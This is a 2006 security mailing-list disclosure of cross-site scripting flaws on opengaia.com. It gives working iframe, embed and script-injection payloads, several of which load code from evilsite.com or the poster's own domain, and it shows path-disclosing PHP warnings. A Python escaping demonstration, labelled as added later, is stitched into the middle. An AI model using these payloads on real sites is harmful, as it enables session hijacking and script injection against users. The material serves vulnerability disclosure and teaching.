Open Source and information security mailing list archives
Message-ID: <20060611055138.7401.qmail@securityfocus.com>
Date: 11 Jun 2006 05:51:38 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Opengaia.com - XSS Vuln & Session Include


Opengaia.com

Homepage:
http://www.opengaia.com

Affected files:
my_page.php
modele.php
editing your profile
the search input box
adding a diary/blog

------------------------------------

Just like onlinenode.com's vulnerabilities, this site appears to filter data in about the same way. Below is one way to trigger an XSS vuln by closing the attribute quotes and injecting an unclosed (open-ended) iframe tag.

http://www.opengaia.com/my_page.php?viewed_id=6871">'>'><iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274

<embed> tags also work in each .php file. Example:

http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">
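The two payloads above both work the same way: the parameter is echoed into a quoted HTML attribute, a leading `"` closes that attribute, and whatever follows is parsed as new markup. The following script is an added example, not code from the original post or from opengaia.com; the template it renders into is a constructed stand-in for the page fragment the report implies, since the real templates are not on the page. It pulls the viewed_id value out of the PoC URL, renders it the unescaped way the report describes and then with attribute-context escaping, and checks whether attacker-controlled tags end up outside the attribute.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the page fragment the report implies: the
# viewed_id query parameter is echoed into a double-quoted attribute.
# Assumption: the real opengaia.com template is not on the page.
TEMPLATE = '<input type="hidden" name="viewed_id" value="{value}">'

# The first PoC link from the report, verbatim.
POC_URL = (
    "http://www.opengaia.com/my_page.php?viewed_id=6871\">'>'>"
    "<iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>"
    "&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274"
)

# URL-decoded forms of the two payloads quoted in the report.
IFRAME_PAYLOAD = "6871\">'>'><iframe src=http://evilsite.com/scriptlet.html <<BR><BR>"
EMBED_PAYLOAD = "6871''\"<\"'><EMBED src=http://www.evilsite.com/badflash.swf></embed><'<\"\">"


def param_from_url(url, name):
    """Return the URL-decoded value of one query parameter (first occurrence)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(name, [""])[0]


def render_vulnerable(value):
    """Echo the parameter into the attribute unescaped, as the report says the site does."""
    return TEMPLATE.format(value=value)


def render_fixed(value):
    """Escape for the attribute context: & < > " and ' all become entities,
    so the attacker's leading quote can no longer terminate the attribute."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def breaks_out(rendered):
    """True if an <iframe> or <embed> tag appears after the attribute's closing
    quote, i.e. the input terminated the attribute and started new markup.
    Crude, but exactly the condition the report's payloads rely on."""
    start = rendered.find('value="') + len('value="')
    closing = rendered.find('"', start)
    tail = rendered[closing:].lower()
    return "<iframe" in tail or "<embed" in tail


if __name__ == "__main__":
    value = param_from_url(POC_URL, "viewed_id")
    for label, renderer in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = renderer(value)
        print(f"{label:10s} breaks out: {breaks_out(out)}")
        print("  " + out)
```

The only difference between the two renderers is `html.escape(..., quote=True)`; dropping `quote=True` would leave `"` and `'` intact and reopen the attribute break-out shown in the report.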


modele.php XSS Vuln:

With this payload we get PHP warnings with full path disclosure, and the XSS does not fire:

http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C

Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243

Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247

Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/public_html/modele.php on line 247

modele.php XSS Vuln using iframe tag:

http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre=

-------------------------------------

Editing your profile XSS with PHP Session included:

The input boxes for editing your profile do not properly filter user input before rendering it. For a PoC we will use end tags and inject <script> tags to bypass this filter:

'>"><""><SCRIPT SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"">

Screenshots of PoC in action:

http://www.youfucktard.com/xsp/gaia2.jpg
http://www.youfucktard.com/xsp/gaia3.jpg

-----------------------------------

Search input box XSS Vuln PoC:

In the search box, try putting:
<iframe src=http://www.evilsite.com/scriptlet.html <

---------------------------------

Data isn't properly filtered when adding a diary/blog either. For a PoC, try putting:

<iframe src=http://evilsite.com/scriptlet.html <

